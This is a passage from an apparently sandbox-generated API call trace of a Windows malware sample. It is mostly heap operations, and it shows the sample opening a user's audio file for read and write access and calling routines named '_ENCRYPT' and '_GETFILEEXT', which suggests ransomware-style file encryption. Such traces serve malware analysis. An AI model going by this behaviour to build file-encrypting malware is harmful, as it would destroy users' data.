hHeap=0x8a0000) returned 1 [0187.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.258] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\x4yfdz60f6cktl.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0187.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0187.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0187.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0187.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0187.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=92, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb8) returned 0x8fabc0 [0187.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=92, lpWideCharStr=0x8fabc0, cchWideChar=92 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav") returned 92 [0187.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0187.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fabc0 | out: hHeap=0x8a0000) returned 1 [0187.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0187.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0187.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.262] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0187.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.264] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0187.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0187.264] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0187.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0187.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.265] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.266] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0187.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0187.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.266] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0187.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0187.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.267] CloseHandle (hObject=0x120) returned 1 [0187.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0187.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0187.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0187.267] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0187.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.268] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.268] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.268] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0187.268] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.268] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0187.268] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0187.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, 